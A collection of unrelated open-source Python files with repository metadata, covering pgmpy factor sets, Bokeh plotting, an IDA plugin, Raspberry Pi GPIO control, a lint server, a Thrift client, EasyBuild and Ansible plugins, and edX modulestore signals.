<DiscreteFactor representing phi(x5:2, x7:2, x8:2) at 0x7f8e32b5b690>])
>>> factor_set2 = FactorSet(phi3, phi4)
>>> factor_set3 = factor_set2.product(factor_set1, inplace=False)
>>> print(factor_set2)
set([<DiscreteFactor representing phi(x5:2, x6:2, x7:2) at 0x7f8e32b5b060>,
<DiscreteFactor representing phi(x5:2, x7:2, x8:2) at 0x7f8e32b5b790>])
"""
factor_set = self if inplace else self.copy()
factor_set1 = factorset.copy()
factor_set.add_factors(*factor_set1.factors)
if not inplace:
return factor_set
def divide(self, factorset, inplace=True):
r"""
Returns a new factor set instance after division by the factor set
Division of two factor sets :math:`\frac{\vec\phi_1}{\vec\phi_2}` basically translates to union of all the
factors present in :math:`\vec\phi_2` and :math:`\frac{1}{\phi_i}` of all the factors present in
:math:`\vec\phi_2`.
Parameters
----------
factorset: FactorSet
The divisor
inplace: A boolean (Default value True)
If inplace = True ,then it will modify the FactorSet object, if False then will
return a new FactorSet object.
Returns
--------
If inplace = False, will return a new FactorSet Object which is division of
given factors.
Examples
--------
>>> from pgmpy.factors import FactorSet
>>> from pgmpy.factors.discrete import DiscreteFactor
>>> phi1 = DiscreteFactor(['x1', 'x2', 'x3'], [2, 3, 2], range(12))
>>> phi2 = DiscreteFactor(['x3', 'x4', 'x1'], [2, 2, 2], range(8))
>>> factor_set1 = FactorSet(phi1, phi2)
>>> phi3 = DiscreteFactor(['x5', 'x6', 'x7'], [2, 2, 2], range(8))
>>> phi4 = DiscreteFactor(['x5', 'x7', 'x8'], [2, 2, 2], range(8))
>>> factor_set2 = FactorSet(phi3, phi4)
>>> factor_set3 = factor_set2.divide(factor_set1)
>>> print(factor_set3)
set([<DiscreteFactor representing phi(x3:2, x4:2, x1:2) at 0x7f8e32b5ba10>,
<DiscreteFactor representing phi(x5:2, x6:2, x7:2) at 0x7f8e32b5b650>,
<DiscreteFactor representing phi(x1:2, x2:3, x3:2) at 0x7f8e32b5b050>,
<DiscreteFactor representing phi(x5:2, x7:2, x8:2) at 0x7f8e32b5b8d0>])
"""
factor_set = self if inplace else self.copy()
factor_set1 = factorset.copy()
factor_set.add_factors(
*[phi.identity_factor() / phi for phi in factor_set1.factors]
)
if not inplace:
return factor_set
def marginalize(self, variables, inplace=True):
"""
Marginalizes the factors present in the factor sets with respect to the given variables.
Parameters
----------
variables: list, array-like
List of the variables to be marginalized.
inplace: boolean (Default value True)
If inplace=True it will modify the factor set itself, would create a new factor set
Returns
-------
If inplace = False, will return a new marginalized FactorSet object.
Examples
--------
>>> from pgmpy.factors import FactorSet
>>> from pgmpy.factors.discrete import DiscreteFactor
>>> phi1 = DiscreteFactor(['x1', 'x2', 'x3'], [2, 3, 2], range(12))
>>> phi2 = DiscreteFactor(['x3', 'x4', 'x1'], [2, 2, 2], range(8))
>>> factor_set1 = FactorSet(phi1, phi2)
>>> factor_set1.marginalize('x1')
>>> print(factor_set1)
set([<DiscreteFactor representing phi(x2:3, x3:2) at 0x7f8e32b4cc10>,
<DiscreteFactor representing phi(x3:2, x4:2) at 0x7f8e32b4cf90>])
"""
if isinstance(variables, str):
raise TypeError("Expected list or array-like type got type str")
factor_set = self if inplace else self.copy()
factors_to_be_marginalized = set(
filter(lambda x: set(x.scope()).intersection(variables), factor_set.factors)
)
for factor in factors_to_be_marginalized:
variables_to_be_marginalized = list(
set(factor.scope()).intersection(variables)
)
if inplace:
factor.marginalize(variables_to_be_marginalized, inplace=True)
else:
factor_set.remove_factors(factor)
factor_set.add_factors(
factor.marginalize(variables_to_be_marginalized, inplace=False)
)
if not inplace:
return factor_set
def __mul__(self, other):
return self.product(other)
def __truediv__(self, other):
return self.divide(other)
def __str__(self):
return self.factors.__str__()
def copy(self):
"""
Create a copy of factor set.
Examples
--------
>>> from pgmpy.factors import FactorSet
>>> from pgmpy.factors.discrete import DiscreteFactor
>>> phi1 = DiscreteFactor(['x1', 'x2', 'x3'], [2, 3, 2], range(12))
>>> phi2 = DiscreteFactor(['x3', 'x4', 'x1'], [2, 2, 2], range(8))
>>> factor_set = FactorSet(phi1, phi2)
>>> factor_set
<pgmpy.factors.FactorSet.FactorSet at 0x7fa68f390320>
>>> factor_set_copy = factor_set.copy()
>>> factor_set_copy
<pgmpy.factors.FactorSet.FactorSet at 0x7f91a0031160>
"""
# No need to have copies of factors as argument because __init__ method creates copies.
return FactorSet(*self.factors)
def factorset_product(*factorsets_list):
r"""
Base method used for product of factor sets.
Suppose :math:`\vec\phi_1` and :math:`\vec\phi_2` are two factor sets then their product is a another factors set
:math:`\vec\phi_3 = \vec\phi_1 \cup \vec\phi_2`.
Parameters
----------
factorsets_list: FactorSet1, FactorSet2, ..., FactorSetn
All the factor sets to be multiplied
Returns
-------
Product of factorset in factorsets_list
Examples
--------
>>> from pgmpy.factors import FactorSet
>>> from pgmpy.factors.discrete import DiscreteFactor
>>> from pgmpy.factors import factorset_product
>>> phi1 = DiscreteFactor(['x1', 'x2', 'x3'], [2, 3, 2], range(12))
>>> phi2 = DiscreteFactor(['x3', 'x4', 'x1'], [2, 2, 2], range(8))
>>> factor_set1 = FactorSet(phi1, phi2)
>>> phi3 = DiscreteFactor(['x5', 'x6', 'x7'], [2, 2, 2], range(8))
>>> phi4 = DiscreteFactor(['x5', 'x7', 'x8'], [2, 2, 2], range(8))
>>> factor_set2 = FactorSet(phi3, phi4)
>>> factor_set3 = factorset_product(factor_set1, factor_set2)
>>> print(factor_set3)
set([<DiscreteFactor representing phi(x1:2, x2:3, x3:2) at 0x7fb3a1933e90>,
<DiscreteFactor representing phi(x5:2, x7:2, x8:2) at 0x7fb3a1933f10>,
<DiscreteFactor representing phi(x5:2, x6:2, x7:2) at 0x7fb3a1933f90>,
<DiscreteFactor representing phi(x3:2, x4:2, x1:2) at 0x7fb3a1933e10>])
"""
if not all(isinstance(factorset, FactorSet) for factorset in factorsets_list):
raise TypeError("Input parameters must be FactorSet instances")
return reduce(lambda x, y: x.product(y, inplace=False), factorsets_list)
def factorset_divide(factorset1, factorset2):
r"""
Base method for dividing two factor sets.
Division of two factor sets :math:`\frac{\vec\phi_1}{\vec\phi_2}` basically translates to union of all the factors
present in :math:`\vec\phi_2` and :math:`\frac{1}{\phi_i}` of all the factors present in :math:`\vec\phi_2`.
Parameters
----------
factorset1: FactorSet
The dividend
factorset2: FactorSet
The divisor
Returns
-------
The division of factorset1 and factorset2
Examples
--------
>>> from pgmpy.factors import FactorSet
>>> from pgmpy.factors.discrete import DiscreteFactor
>>> from pgmpy.factors import factorset_divide
>>> phi1 = DiscreteFactor(['x1', 'x2', 'x3'], [2, 3, 2], range(12))
>>> phi2 = DiscreteFactor(['x3', 'x4', 'x1'], [2, 2, 2], range(8))
>>> factor_set1 = FactorSet(phi1, phi2)
>>> phi3 = DiscreteFactor(['x5', 'x6', 'x7'], [2, 2, 2], range(8))
>>> phi4 = DiscreteFactor(['x5', 'x7', 'x8'], [2, 2, 2], range(8))
>>> factor_set2 = FactorSet(phi3, phi4)
>>> factor_set3 = factorset_divide(factor_set2, factor_set1)
>>> print(factor_set3)
set([<DiscreteFactor representing phi(x3:2, x4:2, x1:2) at 0x7f119ad78f90>,
<DiscreteFactor representing phi(x5:2, x6:2, x7:2) at 0x7f119ad78e50>,
<DiscreteFactor representing phi(x1:2, x2:3, x3:2) at 0x7f119ad78ed0>,
<DiscreteFactor representing phi(x5:2, x7:2, x8:2) at 0x7f119ad78e90>])
"""
if not isinstance(factorset1, FactorSet) or not isinstance(factorset2, FactorSet):
raise TypeError("factorset1 and factorset2 must be FactorSet instances")
return factorset1.divide(factorset2, inplace=False)
|
pgmpy/pgmpy
|
pgmpy/factors/FactorSet.py
|
Python
|
mit
| 15,815
|
# The plot server must be running
# Go to http://localhost:5006/bokeh to view this plot
import numpy as np
from scipy.integrate import odeint
from bokeh.plotting import *
sigma = 10
rho = 28
beta = 8.0/3
theta = 3 * np.pi / 4
def lorenz(xyz, t):
x, y, z = xyz
x_dot = sigma * (y - x)
y_dot = x * rho - x * z - y
z_dot = x * y - beta* z
return [x_dot, y_dot, z_dot]
initial = (-10, -7, 35)
t = np.arange(0, 100, 0.001)
solution = odeint(lorenz, initial, t)
x = solution[:, 0]
y = solution[:, 1]
z = solution[:, 2]
xprime = np.cos(theta) * x - np.sin(theta) * y
colors = ["#C6DBEF", "#9ECAE1", "#6BAED6", "#4292C6", "#2171B5", "#08519C", "#08306B",]
output_server("lorenz")
multi_line(np.array_split(xprime, 7), np.array_split(z, 7),
line_color=colors, line_alpha=0.8, line_width=1.5,
tools="pan,wheel_zoom,box_zoom,reset,previewsave", title="lorenz example")
show() # open a browser
|
the13fools/Bokeh_Examples
|
plotting/server/lorenz.py
|
Python
|
bsd-3-clause
| 936
|
import idautils
import idc
from . import vector
class InstructionHashVector(vector.Vector):
type = 'instruction_hash'
type_version = 0
# The Keleven
# http://movies.stackexchange.com/q/11495
keleven = 17391172068829961267
@staticmethod
def _cycle(h, b):
h |= 5
h ^= b
h *= h
h ^= (h >> 32)
h &= 0xffffffffffffffff
return h
def data(self):
h = self.keleven
for ea in idautils.FuncItems(self.offset):
h = self._cycle(h, idc.Byte(ea))
# go over all additional bytes of any instruction
for i in range(ea + 1, ea + idc.ItemSize(ea)):
h = self._cycle(h, idc.Byte(i))
return h
|
nirizr/rematch
|
idaplugin/rematch/collectors/vectors/instruction_hash.py
|
Python
|
gpl-3.0
| 654
|
import os
import numpy as np
from scipy.io import savemat
from config import ECG_eHEALTH_DATA_DIR
SOURCE_DIR = 'trainECG'
TARGET_DIR = 'trainECG_mat'
source_data_path = os.path.join(ECG_eHEALTH_DATA_DIR, SOURCE_DIR)
target_data_path = os.path.join(ECG_eHEALTH_DATA_DIR, TARGET_DIR)
if not os.path.exists(target_data_path):
os.makedirs(target_data_path)
participant_list = os.listdir(source_data_path)
for participant in participant_list:
source_participant_path = os.path.join(source_data_path, participant)
records_list = os.listdir(source_participant_path)
target_participant_dir = os.path.join(target_data_path, participant)
print target_participant_dir
if not os.path.exists(target_participant_dir):
os.makedirs(target_participant_dir)
for record in records_list:
source_record_path = os.path.join(source_data_path, participant, record)
record = record.replace('.npy', '.mat') # update file extension
converted_record_path = os.path.join(target_data_path, participant, record)
ecg_features = np.load(source_record_path)
savemat(converted_record_path, {'ecg_data': ecg_features})
|
YuriyKhoma/ecg-identification
|
npy2mat.py
|
Python
|
apache-2.0
| 1,163
|
# -*- coding: utf-8 -*-
import functools
import time
import sys
import os
import os.path
import posixpath
import re
from six import u, moves, print_
from . import TIME_TO_SLEEP
def try_if_empty(count):
assert count >= 1
def outer_decorator(func):
@functools.wraps(func)
def inner_decorator(*args, **kwargs):
for attempt in moves.range(count - 1): # pylint: disable=E1101
try:
result = func(*args, **kwargs)
except Exception as exc: # pylint: disable=W0703
print_(u("[{0}/{1}] Error during parsing: {2}").format(
attempt, count, exc
), file=sys.stderr)
time.sleep(TIME_TO_SLEEP)
else:
return result
return func(*args, **kwargs)
return inner_decorator
return outer_decorator
def script_example_header(func):
@functools.wraps(func)
def decorator(*args, **kwargs):
print_("#!/bin/bash\nset -e", end="\n\n")
if os.getenv("VIRTUAL_ENV"):
script_path = posixpath.join(
os.getenv("VIRTUAL_ENV"), "bin", "activate"
)
print_(u('source {0}').format(printable_path(script_path)),
end="\n\n")
return func(*args, **kwargs)
return decorator
def printable_path(path):
abspath = os.path.abspath(path)
if re.search(r"\s", abspath) is not None:
abspath = '"' + abspath.replace('"', r'\"') + '"'
return abspath
|
9seconds/iblocklist2ipset
|
iblocklist2ipset/utils.py
|
Python
|
mit
| 1,566
|
########################################################################
import time, sys
import RPi.GPIO as GPIO
GPIO.setmode(GPIO.BOARD)
GPIO.setwarnings(False)
NRST = 7 #GPIO4
BOOT0 = 26 #GPIO7
SHORT = 0.1
LONG = 0.5
VERYLONG = 1.0
def setup():
print "GPIO version: " + str(GPIO.VERSION)
print "Pi revision " + str(GPIO.RPI_REVISION)
def clean():
print "cleaning up..."
GPIO.cleanup()
print "done."
def reset_stm32():
GPIO.setup(NRST, GPIO.OUT) # False for reset
#print "NRST"
GPIO.output(NRST, False)
time.sleep(SHORT)
GPIO.output(NRST, True)
GPIO.setup(NRST, GPIO.IN) # back to input
time.sleep(SHORT)
def enterbootloader():
GPIO.setup(BOOT0, GPIO.OUT) # True for system bootloader
#print "BOOT0"
GPIO.output(BOOT0, True)
time.sleep(SHORT)
reset_stm32()
time.sleep(SHORT)
GPIO.output(BOOT0, False)
time.sleep(SHORT)
GPIO.setup(BOOT0, GPIO.IN) # back to input
def main():
pass
if __name__ == "__main__":
sys.exit(main())
|
ARMinARM/arminarm
|
src/tools/stm32control.py
|
Python
|
gpl-2.0
| 974
|
""" lintswitch lints your code in the background.
http://github.com/grahamking/lintswitch
"""
import sys
import socket
import logging
import os
import os.path
import argparse
from threading import Thread
try:
# python 3
from queue import Queue
except ImportError:
# python 2
from Queue import Queue
from lintswitch import checkers, emitters, http_server
DESC = 'Linting server - https://github.com/grahamking/lintswitch'
LOG = logging.getLogger(__name__)
def main():
"""Start here"""
parser = make_parser()
args = parser.parse_args()
if args.version:
from lintswitch import __version__
print(__version__)
return 0
log_params = {'level': args.loglevel}
if args.logfile:
log_params['filename'] = args.logfile
logging.basicConfig(**log_params) # pylint: disable=W0142
LOG.debug('lintswitch start')
work_queue = Queue()
check_proc = Thread(target=worker,
args=(work_queue, args))
check_proc.daemon = True
check_proc.start()
server = Thread(target=http_server.http_server,
args=(args.httpport,))
server.daemon = True
server.start()
# Listen for connections from vim (or other) plugin
listener = socket.socket()
listener.bind(('127.0.0.1', args.lintport))
listener.listen(10)
try:
main_loop(listener, work_queue)
except KeyboardInterrupt:
listener.close()
print('Bye')
return 0
def make_parser():
"""argparse object which can parse command line arguments,
or print help.
"""
parser = argparse.ArgumentParser(
description=DESC,
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument(
'-v', '--version',
action='store_true',
help='Print version info and quit')
parser.add_argument(
'--loglevel',
default='DEBUG',
choices=['DEBUG', 'INFO', 'WARN', 'ERROR', 'FATAL'],
help='One of DEBUG, INFO, WARN, ERROR or FATAL')
parser.add_argument(
'--logfile',
default=None,
help='Full path of log file. Defaults to stdout.')
parser.add_argument(
'--lintport',
type=int,
default=4008,
help='Port to listen for lint requests')
parser.add_argument(
'--httpport',
type=int,
default=8008,
help='Port for web browser interface')
parser.add_argument(
'--pymetrics_warn',
type=int,
default=5,
help='Cyclomatic complexity considered a warning, per function')
parser.add_argument(
'--pymetrics_error',
type=int,
default=10,
help='Cyclomatic complexity considered an error, per function')
return parser
def main_loop(listener, work_queue):
"""Wait for connections and process them.
@param listener: a socket.socket, open and listening.
"""
while True:
conn, _ = listener.accept()
data = conn.makefile().read()
conn.close()
work_queue.put(data)
def worker(work_queue, args):
"""Takes filename from queue, checks them and displays (emit) result.
"""
while 1:
filename = work_queue.get()
filename = filename.strip()
if not filename:
continue
check_result = checkers.check(filename, args)
if not check_result:
continue
errors, warnings, summaries = check_result
html = emitters.emit(filename, errors, warnings, summaries)
http_server.SHARED_CONDITION.acquire()
http_server.SHARED_RESULT = html
http_server.SHARED_CONDITION.notifyAll()
http_server.SHARED_CONDITION.release()
def find(name):
"""Finds a program on system path."""
for directory in syspath():
candidate = os.path.join(directory, name)
if os.path.exists(candidate):
return candidate
return None
def syspath():
"""OS path as array of strings"""
path = os.getenv('PATH').split(':')
return path
if __name__ == '__main__':
sys.exit(main())
|
grahamking/lintswitch
|
lintswitch/main.py
|
Python
|
gpl-3.0
| 4,151
|
# Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# no_check_set of check_output must be None
no_check_set_white_list = [
'fake_quantize_range_abs_max',
'coalesce_tensor',
'flatten2',
'flatten_contiguous_range',
'lrn',
'squeeze2',
'reshape2',
'transpose2',
'unsqueeze2',
'cross_entropy2',
'seed',
'check_finite_and_unscale',
'update_loss_scaling',
'cudnn_lstm',
'rnn',
'fusion_lstm',
'softmax_with_cross_entropy',
'svd',
'eigh',
'eigvalsh',
'class_center_sample',
]
|
luotao1/Paddle
|
python/paddle/fluid/tests/unittests/white_list/no_check_set_white_list.py
|
Python
|
apache-2.0
| 1,111
|
import os
from setuptools import setup, find_packages
from packstack import version
# Utility function to read the README file.
# Used for the long_description. It's nice, because now 1) we have a top level
# README file and 2) it's easier to type in the README file than to put a raw
# string in below ...
def read(fname):
return open(os.path.join(os.path.dirname(__file__), fname)).read()
setup(
name="packstack",
version=version.version_string(),
author="Derek Higgins",
author_email="derekh@redhat.com",
description=("A utility to install openstack"),
license="ASL 2.0",
keywords="openstack",
url="https://github.com/stackforge/packstack",
packages=find_packages('.'),
include_package_data=True,
long_description=read('README'),
zip_safe=False,
install_requires=['netaddr'],
classifiers=[
"Development Status :: 3 - Alpha",
"Topic :: Utilities",
"License :: OSI Approved :: Apache Software License",
],
scripts=["bin/packstack"]
)
|
mohitsethi/packstack
|
setup.py
|
Python
|
apache-2.0
| 1,032
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from tutorial import Calculator
from tutorial.ttypes import *
from thrift import Thrift
from thrift.transport import TSocket
from thrift.transport import TTransport
from thrift.protocol import TBinaryProtocol
try:
# Make socket
transport = TSocket.TSocket('localhost', 9090)
# Buffering is critical. Raw sockets are very slow
transport = TTransport.TBufferedTransport(transport)
# Wrap in a protocol
protocol = TBinaryProtocol.TBinaryProtocol(transport)
# Create a client to use the protocol encoder
client = Calculator.Client(protocol)
# Connect!
transport.open()
print('Connected')
client.ping()
print('ping()')
sum = client.add(1, 1)
print('1+1=%d' % (sum))
work = Work()
work.op = Operation.DIVIDE
work.num1 = 1
work.num2 = 0
try:
quotient = client.calculate(1, work)
print('Whoa? You know how to divide by zero?')
except InvalidOperation as io:
print('InvalidOperation: %r' % io)
work.op = Operation.SUBTRACT
work.num1 = 15
work.num2 = 10
diff = client.calculate(1, work)
print('15-10=%d' % (diff))
log = client.getStruct(1)
print('Check log: %s' % (log.value))
# Close!
transport.close()
except Thrift.TException as tx:
print('%s' % (tx.message))
|
uber/fbthrift
|
thrift/tutorial/py/PythonClient.py
|
Python
|
apache-2.0
| 2,254
|
##
# Copyright 2009-2015 Ghent University
#
# This file is part of EasyBuild,
# originally created by the HPC team of Ghent University (http://ugent.be/hpc/en),
# with support of Ghent University (http://ugent.be/hpc),
# the Flemish Supercomputer Centre (VSC) (https://vscentrum.be/nl/en),
# the Hercules foundation (http://www.herculesstichting.be/in_English)
# and the Department of Economy, Science and Innovation (EWI) (http://www.ewi-vlaanderen.be/en).
#
# http://github.com/hpcugent/easybuild
#
# EasyBuild is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation v2.
#
# EasyBuild is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with EasyBuild. If not, see <http://www.gnu.org/licenses/>.
##
"""
EasyBuild support for building and installing toy, implemented as an easyblock
@author: Kenneth Hoste (Ghent University)
"""
import os
import platform
import shutil
from easybuild.framework.easyblock import EasyBlock
from easybuild.tools.build_log import EasyBuildError
from easybuild.tools.filetools import mkdir
from easybuild.tools.modules import get_software_root, get_software_version
from easybuild.tools.run import run_cmd
class EB_toy(EasyBlock):
"""Support for building/installing toy."""
def prepare_for_extensions(self):
"""
Prepare for installing toy extensions.
"""
# insert new packages by building them with RPackage
self.cfg['exts_defaultclass'] = "Toy_Extension"
self.cfg['exts_filter'] = ("%(ext_name)s", "")
def configure_step(self, name=None):
"""Configure build of toy."""
if name is None:
name = self.name
# make sure Python system dep is handled correctly when specified
if self.cfg['allow_system_deps']:
if get_software_root('Python') != 'Python' or get_software_version('Python') != platform.python_version():
raise EasyBuildError("Sanity check on allowed Python system dep failed.")
if os.path.exists("%s.source" % name):
os.rename('%s.source' % name, '%s.c' % name)
def build_step(self, name=None):
"""Build toy."""
if name is None:
name = self.name
run_cmd('%(prebuildopts)s gcc %(name)s.c -o %(name)s' % {
'name': name,
'prebuildopts': self.cfg['prebuildopts'],
})
def install_step(self, name=None):
"""Install toy."""
if name is None:
name = self.name
bindir = os.path.join(self.installdir, 'bin')
mkdir(bindir, parents=True)
if os.path.exists(name):
shutil.copy2(name, bindir)
# also install a dummy libtoy.a, to make the default sanity check happy
libdir = os.path.join(self.installdir, 'lib')
mkdir(libdir, parents=True)
f = open(os.path.join(libdir, 'lib%s.a' % name), 'w')
f.write(name.upper())
f.close()
|
nesi/easybuild-framework
|
test/framework/sandbox/easybuild/easyblocks/t/toy.py
|
Python
|
gpl-2.0
| 3,252
|
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
import os.path
from ansible.errors import AnsibleError
from ansible.module_utils._text import to_text
from ansible.plugins.action import ActionBase
class ActionModule(ActionBase):
def run(self, tmp=None, task_vars=None):
''' handler for file transfer operations '''
if task_vars is None:
task_vars = dict()
result = super(ActionModule, self).run(tmp, task_vars)
if result.get('skipped'):
return result
source = self._task.args.get('src', None)
dest = self._task.args.get('dest', source)
if source is None:
result['failed'] = True
result['msg'] = "src is required"
return result
try:
source = self._find_needle('files', source)
except AnsibleError as e:
result['failed'] = True
result['msg'] = to_text(e)
return result
# expand any user home dir specifier
dest = self._remote_expand_user(dest)
if not os.path.isabs(dest):
dest = self._connection._shell.join_path('~', dest)
dest = self._remote_expand_user(dest)
# Ensure dest file parents exist
dest_dir = os.path.dirname(os.path.abspath(dest))
module_return = self._execute_module(
module_name='file',
module_args=dict(path=dest_dir, state='directory', follow='yes'),
task_vars=task_vars,
tmp=tmp)
result.update(module_return)
if result.get('failed'):
return result
module_return = self._execute_module(
module_name='file',
module_args=dict(src=source, dest=dest, state='link', force='yes'),
task_vars=task_vars,
tmp=tmp)
result.update(module_return)
return result
|
hanjianwei/dotfiles
|
action_plugins/link.py
|
Python
|
gpl-3.0
| 1,931
|
import logging
from datetime import datetime
from .actions import actions
from .system_menu.system_menu import system_menu
from .library.buttons import library_buttons
from .book.buttons import book_buttons
from .go_to_page.buttons import go_to_page_buttons
from .bookmarks.buttons import bookmarks_buttons
from .language.buttons import language_buttons
log = logging.getLogger(__name__)
bindings = {
'library': library_buttons,
'book': book_buttons,
'go_to_page': go_to_page_buttons,
'bookmarks_menu': bookmarks_buttons,
'language': language_buttons,
'help_menu': {
'single': {
'L': actions.close_menu(),
'>': actions.next_page(),
'<': actions.previous_page(),
'R': actions.toggle_help_menu(),
},
'long': {
'L': actions.close_menu(),
'>': actions.next_page(),
'<': actions.previous_page(),
'R': actions.toggle_help_menu(),
'X': actions.reset_display('start'),
},
},
'system_menu': {
'single': {
'R': actions.toggle_help_menu(),
'>': actions.next_page(),
'<': actions.previous_page(),
'L': actions.close_menu(),
},
'long': {
'R': actions.toggle_help_menu(),
'>': actions.next_page(),
'<': actions.previous_page(),
'L': actions.close_menu(),
'X': actions.reset_display('start'),
},
}
}
sys_menu = system_menu()
for i, item in enumerate(sys_menu):
action = sys_menu[item]
bindings['system_menu']['single'][str(i + 2)] = action
async def dispatch_button(key, press_type, state, dispatch):
if state['help_menu']['visible']:
location = 'help_menu'
else:
location = state['location']
try:
action = bindings[location][press_type][key]
except KeyError:
log.debug('no binding for key {}, {} press'.format(key, press_type))
else:
await dispatch(action)
prev_buttons = {}
long_buttons = {}
async def check(driver, state, dispatch):
# this is a hack for now until we change the protocol, we read the buttons
# twice so we don't miss the release of short presses
for _ in range(2):
buttons = driver.get_buttons()
for key in buttons:
up_or_down = buttons[key]
if up_or_down == 'down':
prev_buttons[key] = datetime.now()
elif up_or_down == 'up':
if key in long_buttons:
del long_buttons[key]
del prev_buttons[key]
else:
if key in prev_buttons:
del prev_buttons[key]
await dispatch_button(key, 'single', state, dispatch)
for key in prev_buttons:
diff = (datetime.now() - prev_buttons[key]).total_seconds()
if diff > 0.5:
prev_buttons[key] = datetime.now()
long_buttons[key] = True
await dispatch_button(key, 'long', state, dispatch)
|
Bristol-Braille/canute-ui
|
ui/buttons.py
|
Python
|
gpl-3.0
| 3,110
|
"""
Module that provides a connection to the ModuleStore specified in the django settings.
Passes settings.MODULESTORE as kwargs to MongoModuleStore
"""
from importlib import import_module
import gettext
import logging
import six
from pkg_resources import resource_filename
import re
from django.conf import settings
# This configuration must be executed BEFORE any additional Django imports. Otherwise, the imports may fail due to
# Django not being configured properly. This mostly applies to tests.
if not settings.configured:
settings.configure()
from django.core.cache import caches, InvalidCacheBackendError
import django.dispatch
import django.utils
from django.utils.translation import get_language, to_locale
from edx_django_utils.cache import DEFAULT_REQUEST_CACHE
from xmodule.contentstore.django import contentstore
from xmodule.modulestore.draft_and_published import BranchSettingMixin
from xmodule.modulestore.mixed import MixedModuleStore
from xmodule.util.xmodule_django import get_current_request_hostname
# We also may not always have the current request user (crum) module available
try:
from xblock_django.user_service import DjangoXBlockUserService
from crum import get_current_user
HAS_USER_SERVICE = True
except ImportError:
HAS_USER_SERVICE = False
try:
from xblock_django.api import disabled_xblocks
except ImportError:
disabled_xblocks = None
log = logging.getLogger(__name__)
ASSET_IGNORE_REGEX = getattr(settings, "ASSET_IGNORE_REGEX", r"(^\._.*$)|(^\.DS_Store$)|(^.*~$)")
class SwitchedSignal(django.dispatch.Signal):
"""
SwitchedSignal is like a normal Django signal, except that you can turn it
on and off. This is especially useful for tests where we want to be able to
isolate signals and disable expensive operations that are irrelevant to
what's being tested (like everything that triggers off of a course publish).
SwitchedSignals default to being on. You should be very careful if you ever
turn one off -- the only instances of this class are shared class attributes
of `SignalHandler`. You have to make sure that you re-enable the signal when
you're done, or else you may permanently turn that signal off for that
process. I can't think of any reason you'd want to disable signals outside
of running tests.
"""
def __init__(self, name, *args, **kwargs):
"""
The `name` parameter exists only to make debugging more convenient.
All other args are passed to the constructor for django.dispatch.Signal.
"""
super(SwitchedSignal, self).__init__(*args, **kwargs)
self.name = name
self._allow_signals = True
def disable(self):
"""
Turn off signal sending.
All calls to send/send_robust will no-op.
"""
self._allow_signals = False
def enable(self):
"""
Turn on signal sending.
Calls to send/send_robust will behave like normal Django Signals.
"""
self._allow_signals = True
def send(self, *args, **kwargs):
"""
See `django.dispatch.Signal.send()`
This method will no-op and return an empty list if the signal has been
disabled.
"""
log.debug(
"SwitchedSignal %s's send() called with args %s, kwargs %s - %s",
self.name,
args,
kwargs,
"ALLOW" if self._allow_signals else "BLOCK"
)
if self._allow_signals:
return super(SwitchedSignal, self).send(*args, **kwargs)
return []
def send_robust(self, *args, **kwargs):
"""
See `django.dispatch.Signal.send_robust()`
This method will no-op and return an empty list if the signal has been
disabled.
"""
log.debug(
"SwitchedSignal %s's send_robust() called with args %s, kwargs %s - %s",
self.name,
args,
kwargs,
"ALLOW" if self._allow_signals else "BLOCK"
)
if self._allow_signals:
return super(SwitchedSignal, self).send_robust(*args, **kwargs)
return []
def __repr__(self):
return u"SwitchedSignal('{}')".format(self.name)
class SignalHandler(object):
"""
This class is to allow the modulestores to emit signals that can be caught
by other parts of the Django application. If your app needs to do something
every time a course is published (e.g. search indexing), you can listen for
that event and kick off a celery task when it happens.
To listen for a signal, do the following::
from django.dispatch import receiver
from celery.task import task
from xmodule.modulestore.django import modulestore, SignalHandler
@receiver(SignalHandler.course_published)
def listen_for_course_publish(sender, course_key, **kwargs):
do_my_expensive_update.delay(course_key)
@task()
def do_my_expensive_update(course_key):
# ...
Things to note:
1. We receive using the Django Signals mechanism.
2. The sender is going to be the class of the modulestore sending it.
3. The names of your handler function's parameters *must* be "sender" and "course_key".
4. Always have **kwargs in your signal handler, as new things may be added.
5. The thing that listens for the signal lives in process, but should do
almost no work. Its main job is to kick off the celery task that will
do the actual work.
"""
# If you add a new signal, please don't forget to add it to the _mapping
# as well.
pre_publish = SwitchedSignal("pre_publish", providing_args=["course_key"])
course_published = SwitchedSignal("course_published", providing_args=["course_key"])
course_deleted = SwitchedSignal("course_deleted", providing_args=["course_key"])
library_updated = SwitchedSignal("library_updated", providing_args=["library_key"])
item_deleted = SwitchedSignal("item_deleted", providing_args=["usage_key", "user_id"])
_mapping = {
signal.name: signal
for signal
in [pre_publish, course_published, course_deleted, library_updated, item_deleted]
}
def __init__(self, modulestore_class):
self.modulestore_class = modulestore_class
@classmethod
def all_signals(cls):
"""Return a list with all our signals in it."""
return cls._mapping.values()
@classmethod
def signal_by_name(cls, signal_name):
"""Given a signal name, return the appropriate signal."""
return cls._mapping[signal_name]
def send(self, signal_name, **kwargs):
"""
Send the signal to the receivers.
"""
signal = self._mapping[signal_name]
responses = signal.send_robust(sender=self.modulestore_class, **kwargs)
for receiver, response in responses:
log.info('Sent %s signal to %s with kwargs %s. Response was: %s', signal_name, receiver, kwargs, response)
# to allow easy imports
